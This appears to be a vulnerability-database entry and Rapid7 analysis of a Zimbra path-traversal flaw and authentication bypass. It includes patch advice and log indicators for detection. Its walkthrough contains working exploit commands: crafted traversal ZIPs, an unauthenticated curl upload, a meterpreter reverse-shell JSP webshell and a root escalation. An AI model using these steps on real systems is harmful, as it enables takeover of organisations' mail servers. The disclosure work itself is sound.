Attacker Value
Very High
(1 user assessed)
Exploitability
Very High
(1 user assessed)
User Interaction
None
Privileges Required
High
Attack Vector
Network
3

CVE-2022-27925

Disclosure Date: April 21, 2022
Exploited in the Wild
Add MITRE ATT&CK tactics and techniques that apply to this CVE.

Description

Zimbra Collaboration (aka ZCS) 8.8.15 and 9.0 has mboximport functionality that receives a ZIP archive and extracts files from it. An authenticated user with administrator rights has the ability to upload arbitrary files to the system, leading to directory traversal.

Add Assessment

2
Ratings
Technical Analysis

This is really bad – remote root on an organization’s email server, if combined with other (currently 0-day vulnerabilities). Patch ASAP!

CVSS V3 Severity and Metrics
Base Score:
7.2 High
Impact Score:
5.9
Exploitability Score:
1.2
Vector:
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
Attack Vector (AV):
Network
Attack Complexity (AC):
Low
Privileges Required (PR):
High
User Interaction (UI):
None
Scope (S):
Unchanged
Confidentiality (C):
High
Integrity (I):
High
Availability (A):
High

General Information

Vendors

  • zimbra

Products

  • collaboration 8.8.15,
  • collaboration 9.0.0

Exploited in the Wild

Reported by:

Additional Info

Technical Analysis

Description

In late March 2022, Zimbra released versions 9.0.0 patch 24 and 8.8.15 patch 31 to address multiple vulnerabilities in Zimbra Collaboration Suite, including CVE-2022-27924 (which we wrote about previously) and CVE-2022-27925.

Originally, Zimbra called CVE-2022-27925 an authenticated path-traversal attack, where an administrative user could write files into any directory on the filesystem as the Zimbra account. Because it was originally thought to be an administrator-only attack, NVD assigned it a CVSS base score of 7.8. Later, Volexity noticed that attackers exploiting this vulnerability had found a way to bypass the administrative requirements, and wrote about it on August 10, 2022. This new authentication bypass got a new identifier – CVE-2022-37042.

By combining the original path-traversal vulnerability and new authentication bypass, attackers can remotely compromise a Zimbra Collaboration Suite system via the administrator port (by default, 7071) anonymously. Combined with a currently unpatched privilege escalation vulnerability that we recently wrote about and wrote an exploit for, these three vulnerabilities lead to remote command execution as the root user on unpatched systems.

Although the public advisories don’t mention it, according to our analysis, Zimbra Collaboration Suite Network Edition (the paid edition) is vulnerable, and the Open Source Edition (free) is not (since it does not have the vulnerable mboximport endpoint). Vulnerable versions are:

  • Zimbra Collaboration Suite Network Edition 9.0.0 Patch 23 (and earlier)
  • Zimbra Collaboration Suite Network Edition 8.8.15 Patch 30 (and earlier)

These vulnerabilities (and others in Zimbra) are being targeted for widespread exploitation in the wild, and should therefore be patched or taken offline as soon as possible. If you suspect you’ve been compromised, Zimbra provides steps to rebuild your Zimbra Collaboration Suite server from scratch on the latest patch without losing data.

Technical analysis

The core issue in CVE-2022-27925 is that the /service/extension/backup/mboximport endpoint on Zimbra Collaboration Suite’s administrative port (7071 by default), which is designed to accept a .zip file import, does not validate paths and is therefore vulnerable to a path-traversal attack. A .zip file with a relative path can write anywhere on the file system. To demonstrate, we created a .zip file with a long path, then replaced that path with path traversal:

$ echo 'Hello, world!' > aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
$ zip test.zip aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
  adding: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa (stored 0%)
$ sed -i 's|aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa|../../../../../../../../../../../tmp/test.txt|' test.zip

Then we upload it to the Zimbra server using cURL, passing a valid token (which, as we’ll see, is actually not required):

$ curl -X POST -k 'https://10.0.0.166:7071/service/extension/backup/mboximport?account-name=admin&ow=1&no-switch=1&append=1' -b 'ZM_AUTH_TOKEN=0_530[...]b' --data-binary **[@test](/contributors/test)**.zip
<html>
<head>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8"/>
<title>Error 400 Error importing mailbox for account admin on server 10.0.0.166: unable to read metadata for account f4ddb29a-340f-4373-8171-c18b64c4b485</title>
</head>
[...]

We can verify it’s written to the server:

root@zimbra6:~# ls -l /tmp/test.txt
-rw-r----- 1 zimbra zimbra 14 Aug 18 22:18 /tmp/test.txt
root@zimbra6:~# cat /tmp/test.txt
Hello, world!

The more recent authentication-bypass vulnerability – CVE-2022-37042 – was simply that the authentication cookie is not actually necessary:

$ echo 'Hello, world!' > aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
$ zip test2.zip aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
  adding: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa (stored 0%)
$ sed -i 's|aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa|../../../../../../../../../../../tmp/test2.txt|' test2.zip
$ curl -X POST -k 'https://10.0.0.166:7071/service/extension/backup/mboximport?account-name=admin&ow=1&no-switch=1&append=1' --data-binary **[@test](/contributors/test)**2.zip
$ ssh root@10.0.0.166 cat /tmp/test2.txt
Hello, world!

We can also create a JSP payload using msfvenom, then upload it to the public webroot:

$ msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.0.0.146 RHOST=10.0.0.166 -f jsp -o aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 130 bytes
Final size of jsp file: 1919 bytes
Saved as: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

$ zip test3.zip aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 
  adding: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa (deflated 59%)

$ sed -i 's|aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa|../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/backdoor.jsp|' test3.zip 

$ curl -X POST -k 'https://10.0.0.166:7071/service/extension/backup/mboximport?account-name=admin&ow=1&no-switch=1&append=1' --data-binary **[@test](/contributors/test)**3.zip
<html>
[...]

Then set up a Metasploit listener:

msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set PAYLOAD linux/x64/meterpreter/reverse_tcp
PAYLOAD => linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.0.0.146
LHOST => 10.0.0.146
msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 10.0.0.146:4444

Trigger the payload:

curl -k 'https://10.0.0.166/public/backdoor.jsp'

And get the shell:

msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 10.0.0.146:4444 
[*] Sending stage (3020772 bytes) to 10.0.0.166
[*] Meterpreter session 1 opened (10.0.0.146:4444 -> 10.0.0.166:54702) at 2022-08-18 15:32:50 -0700

meterpreter > getuid
Server username: zimbra

And, for bonus points, use an 0-day to get root:

meterpreter > bg
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use exploit/linux/local/zimbra_slapper_priv_esc
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/zimbra_slapper_priv_esc) > set SESSION 1
SESSION => 1
msf6 exploit(linux/local/zimbra_slapper_priv_esc) > exploit

[*] Started reverse TCP handler on 10.0.0.146:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Executing: sudo -n -l
[+] The target appears to be vulnerable.
[*] Creating exploit directory: /tmp/.pz8ORN
[*] Attempting to trigger payload: sudo /opt/zimbra/libexec/zmslapd -u root -g root -f /tmp/.pz8ORN/.w7ryDXBV
[*] Sending stage (3020772 bytes) to 10.0.0.166
[+] Deleted /tmp/.pz8ORN
[*] Meterpreter session 2 opened (10.0.0.146:4444 -> 10.0.0.166:34904) at 2022-08-18 15:34:49 -0700


meterpreter > getuid
Server username: root

IOCs

This vulnerability lets us overwrite an arbitrary file, so an attacker can exploit this in a variety of ways depending on their goal. The most obvious exploit route, however, is the one we demonstrated – writing a webshell to the public directory (either zimbra/ or zimbraAdmin/). Any unusual files in those folders should be suspect.

The file /opt/zimbra/log/mailbox.log logs any bad .zip file it receives with entries such as:

2022-08-18 22:27:57,060 ERROR [qtp678433396-593:https:https://10.0.0.166:7071/service/extension/backup/mboximport?account-name=admin&ow=1&no-switch=1&append=1] [] mboxmove - Auth failed
2022-08-18 22:27:57,061 INFO  [qtp678433396-593:https:https://10.0.0.166:7071/service/extension/backup/mboximport?account-name=admin&ow=1&no-switch=1&append=1] [] mboxmove - Importing mailbox for account admin overwrite=true
2022-08-18 22:27:57,062 INFO  [qtp678433396-593:https:https://10.0.0.166:7071/service/extension/backup/mboximport?account-name=admin&ow=1&no-switch=1&append=1] [] mboxmove - Importing data for admin into mailbox id 1.
2022-08-18 22:27:57,062 WARN  [qtp678433396-593:https:https://10.0.0.166:7071/service/extension/backup/mboximport?account-name=admin&ow=1&no-switch=1&append=1] [] mboxmove - IO error
java.io.IOException: unable to read metadata for account f4ddb29a-340f-4373-8171-c18b64c4b485
	at com.zimbra.cs.backup.util.Utils.IOException(Utils.java:72)
	at com.zimbra.cs.backup.ZipBackupTarget$RestoreAcctSession.<init>(ZipBackupTarget.java:418)
	at com.zimbra.cs.backup.ZipBackupTarget.getAccountSession(ZipBackupTarget.java:142)

[...]

Caused by: com.zimbra.common.service.ServiceException: system failure: Unable to parse XML file /opt/zimbra/backup/tmp/mboxmove/f4ddb29a-340f-4373-8171-c18b64c4b485/meta.xml
ExceptionId:qtp678433396-593:https:https://10.0.0.166:7071/service/extension/backup/mboximport?account-name=admin&ow=1&no-switch=1&append=1:1660861677062:468a5dc6ec65dbfe
Code:service.FAILURE
	at com.zimbra.common.service.ServiceException.FAILURE(ServiceException.java:288)
	at com.zimbra.cs.backup.XmlMeta.readAccountBackup(XmlMeta.java:409)
	at com.zimbra.cs.backup.ZipBackupTarget$RestoreAcctSession.<init>(ZipBackupTarget.java:414)

Any of these errors would detect an attempted attack, as well as any accesses to the /service/extension/backup/mboximport endpoint, which is not typically used:

# cat /opt/zimbra/log/access_log.2022-08-18
10.0.0.146 - - [18/Aug/2022:22:17:03 +0000] "POST https://10.0.0.166:7071/service/extension/backup/mboximport?account-name=admin&ow=1&append=1 HTTP/1.1" 400 387 "-" "curl/7.82.0" 2
10.0.0.146 - - [18/Aug/2022:22:17:09 +0000] "POST https://10.0.0.166:7071/service/extension/backup/mboximport?account-name=admin&ow=1&no-switch=1&append=1 HTTP/1.1" 400 521 "-" "curl/7.82.0" 2
10.0.0.146 - - [18/Aug/2022:22:18:11 +0000] "POST https://10.0.0.166:7071/service/extension/backup/mboximport?account-name=admin&ow=1&no-switch=1&append=1 HTTP/1.1" 400 521 "-" "curl/7.82.0" 2
10.0.0.146 - - [18/Aug/2022:22:25:32 +0000] "POST https://10.0.0.166:7071/service/extension/backup/mboximport?account-name=admin&ow=1&no-switch=1&append=1 HTTP/1.1" 401 287 "-" "curl/7.82.0" 12
10.0.0.146 - - [18/Aug/2022:22:27:57 +0000] "POST https://10.0.0.166:7071/service/extension/backup/mboximport?account-name=admin&ow=1&no-switch=1&append=1 HTTP/1.1" 401 287 "-" "curl/7.82.0" 12

Note that because this chain of exploits gains root access, attackers can tamper with logfiles at will.

Guidance

Because this is being actively exploited, Rapid7 strongly encourages all Zimbra Collaboration Suite users to either update their Zimbra installations, or to temporarily take them offline until they can be updated. If you suspect you’ve been compromised, you should rebuild your Zimbra server instead of trying to recover.

References